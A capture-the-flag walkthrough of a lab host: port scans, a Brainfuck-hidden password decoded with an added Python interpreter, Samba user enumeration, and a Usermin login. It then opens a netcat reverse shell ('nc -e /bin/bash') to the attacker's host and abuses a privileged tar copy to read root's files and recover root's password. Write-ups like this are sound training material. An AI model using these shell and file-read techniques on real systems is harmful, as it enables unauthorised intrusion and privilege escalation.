Enumeration with nmap
# Nmap 7.94 scan initiated Sat Aug 26 16:57:19 2023 as: nmap -p- --min-rate 1000 -oN fulltcp.txt -v -Pn 192.168.224.238
Nmap scan report for 192.168.224.238
Host is up (0.14s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
20000/tcp open dnp
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Aug 26 16:58:40 2023 -- 1 IP address (1 host up) scanned in 81.77 seconds
First run a full TCP port scan to learn which ports are open, then run nmap's default scripts and version detection against just those ports to identify the services behind them.
# Nmap 7.94 scan initiated Sat Aug 26 17:01:43 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 80,139,445,10000,20000 -Pn 192.168.224.238
Nmap scan report for 192.168.224.238
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-08-26T16:01:57
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 26 17:02:28 2023 -- 1 IP address (1 host up) scanned in 45.39 seconds
Cool, now we know which services are running on those ports.
A web server is listening on port 80; opening it in a browser shows the default Apache page. Viewing the page source, however, reveals a string written in Brainfuck. Brainfuck is an esoteric programming language, not an encryption scheme: the characters are a program, and running it produces the hidden text.
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
Let's decode it.
Running the program through a Brainfuck decoder yields .2uqPEfj3D<P'a-3, which looks very much like a password. Keep it and enumerate further.
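The decoding step, as an added Python example that is not part of the original write-up: a small Brainfuck interpreter, plus a helper that pulls Brainfuck runs out of arbitrary page source so the same script works on other targets that hide a program in an HTML comment. PAGE_PROGRAM is the string from the Apache page source above; SAMPLE_SOURCE is a constructed HTML snippet used only to show the extraction.

```python
"""Brainfuck decoder (added example, not from the original write-up).

Brainfuck is a language, not a cipher: the "encoded" string is a program and
its output is the hidden text. Running it with this interpreter reproduces
what an online decoder does.
"""

# The program found in the Apache default page source (copied from the write-up).
PAGE_PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++."
    ">>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++."
    "<<+.>-.--------.++++++++++++++++++++.<------------.>>---------."
    "<<++++++.++++++."
)

# Constructed HTML for illustration: a default page with the program in a comment.
SAMPLE_SOURCE = (
    "<html><body><h1>Apache2 Debian Default Page: It works</h1>\n"
    "<!-- " + PAGE_PROGRAM + " -->\n"
    "</body></html>\n"
)

BF_CHARS = set("+-<>[].,")


def run_brainfuck(program: str, tape_size: int = 30000) -> str:
    """Execute a Brainfuck program with no input and return what it prints."""
    # Pre-compute matching brackets so loops are constant-time jumps and
    # unbalanced programs are rejected before execution.
    jumps, stack = {}, []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = [0] * tape_size          # 8-bit cells, wrapping on overflow
    ptr = pc = 0
    out = []
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = 0               # no stdin: treat input as EOF (0)
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]              # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]              # loop again
        # any other character is a comment in Brainfuck and is ignored
        pc += 1
    return "".join(out)


def extract_brainfuck(text: str, min_len: int = 20) -> list:
    """Return maximal runs of Brainfuck characters in text (e.g. HTML source).

    Short runs such as the '<' '>' '--' of HTML tags and comments fall below
    min_len and are dropped; whitespace inside a program would split it, so a
    program spread over several lines should be joined before decoding.
    """
    runs, cur = [], []
    for ch in text:
        if ch in BF_CHARS:
            cur.append(ch)
            continue
        if len(cur) >= min_len:
            runs.append("".join(cur))
        cur = []
    if len(cur) >= min_len:
        runs.append("".join(cur))
    return runs


def decode_from_source(html: str) -> list:
    """Decode every Brainfuck run found in a page source."""
    return [run_brainfuck(p) for p in extract_brainfuck(html)]


if __name__ == "__main__":
    for secret in decode_from_source(SAMPLE_SOURCE):
        print(secret)
```

Pipe real page source in with `curl -s http://target/ | python3 bf_decode.py` after replacing the `__main__` block's input with `sys.stdin.read()`; the interpreter rejects unbalanced brackets instead of looping forever, which matters when you are feeding it untrusted text.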
Another web server is listening on port 10000.
Opening it in a browser redirects to a Webmin login page. Remember the potential password we recovered earlier: trying the user admin with the decoded text as the password fails.
A second MiniServ instance is running on port 20000. Port 20000 is the default port of Usermin, Webmin's companion that lets ordinary Unix users log in with their system accounts, so a system username is the more likely fit there than admin.
Trying the same credentials as before fails again. 🤔 Let's enumerate harder: shoot enum4linux at the SMB service
to get the available users, so we can try real usernames against the login page instead of guessing.
Running enum4linux -a $IP
reveals a Unix user named cyber.
Let's try logging in to the Webmin server with this username and the potential password from earlier.
Bankai!!! 🔥 We are able to log in to the server on port 20000
using the credentials cyber:.2uqPEfj3D<P'a-3.
Let's look around and find a way to get a shell.
Clicking the Terminal button opens a browser-based terminal that runs shell commands as cyber. Let's spawn a reverse shell from it.
With a listener waiting on the attacking machine, a reverse shell was spawned using /bin/nc -e /bin/bash $IP $port. The -e option only exists in some netcat builds (netcat-traditional and nmap's ncat, not netcat-openbsd), so if it is missing, fall back to a bash or Python reverse shell one-liner.
Privilege Escalation
In the home directory of user cyber
we find a copy of the tar binary.
🤔 It is not SUID, so let's see what we can do with it.
Checking GTFOBins, tar has a file-read primitive: extract the target file while passing a custom "compression" program via -I that just writes the data to stderr. 🤔 Hmmmm.
If this copy can read files that cyber normally cannot, it is worth checking it with getcap, since a file capability such as cap_dac_read_search is the usual reason a non-SUID copy of tar can read root-owned files. Let's use it to read root's .bash_history
file and see if we can loot anything.
The history references a file named .old_pass.bak
which is owned by root and not readable by other users. Let's check its content, since we can read root's files.
The file contains a password. su root with that password and boom, we are root.
We broke out of the low-privileged shell 😜 Interesting, yeah?